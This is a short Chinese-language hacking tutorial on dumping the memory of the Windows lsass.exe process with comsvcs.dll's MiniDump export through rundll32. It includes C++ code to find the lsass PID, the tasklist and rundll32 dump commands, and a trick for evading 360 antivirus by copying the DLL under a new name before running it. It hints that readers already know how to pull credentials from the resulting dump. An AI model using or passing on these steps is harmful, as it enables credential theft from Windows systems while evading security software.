简介
comsvcs.dll,在系统崩溃时转储进程内存的系统窗口和系统32,通过rundll32编写,该dll包含函数MiniDumpW
实际使用
用api调或者看进程都可以
此处需要获得lsass.exe的pid
#include<Windows.h>
#include<Tlhelp32.h>
#include<stdio.h>
#include <iostream>
using namespace std;
int getpid() {
DWORD lsassPID = 0;
LPCWSTR processName = L"";
PROCESSENTRY32 processEntry;
processEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (Process32First(hSnapShot, &processEntry)) {
while (_wcsicmp(processName, L"lsass.exe") != 0)
{
Process32Next(hSnapShot, &processEntry);
processName = processEntry.szExeFile;
lsassPID = processEntry.th32ProcessID;
}
wcout << "[+] Got lsass.exe PID: " << lsassPID << endl;
}
return 0;
}
int main() {
getpid();
}
通过tasklist也可以
tasklist | findstr lsass.exe
在有360&火绒的情况下直接冲是会被挡的(火绒无反应)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 508 lsass.dmp full
想想绕过,拷贝下dll,再出来就不挡了
copy C:\windows\System32\comsvcs.dll yyyang.dll
rundll32.exe yyyang.dll, MiniDump 508 lsass.dmp full
然后怎么读大家应该都会
